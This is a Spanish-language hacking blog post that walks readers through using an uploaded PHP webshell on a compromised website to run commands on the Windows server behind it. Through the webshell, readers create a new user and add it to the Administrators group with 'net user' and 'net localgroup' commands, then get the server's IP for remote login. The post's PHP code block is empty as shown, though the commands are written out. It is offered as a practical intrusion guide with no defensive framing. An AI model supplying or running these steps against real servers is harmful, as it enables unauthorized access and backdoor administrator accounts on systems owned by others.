Warning: "continue" targeting switch is equivalent to "break". Did you mean to use "continue 2"? in /home/whitesy7/public_html/blog/wp-content/themes/Divi/includes/builder/functions.php on line 5689
Webshell | WhiteSuit Hacking
Elevar privilegios en servidores windows

Elevar privilegios en servidores windows

by | May 20, 2018 | hacking, whitesuit

Bueno primero necesitan tener subida una shell a una web.
Después tener un archivo shell server windows subido en la web.

El código que incrustaremos es este:

Código: PHP
  1. 

    

    2. 





Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer NT 

AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web.


Ya que realizado lo anterior ahora ponemos : website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.


Ya que hecho esto, ponemos: website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.


Bueno ya que hicimos esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) ya hecho esto hacemos lo siguiente: website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.


Ahora hacemos esto: website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.


Ahora para saber la IP del servidor VPS ponemos: website.com.com/archivo.php?cmd=ipconfig


Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.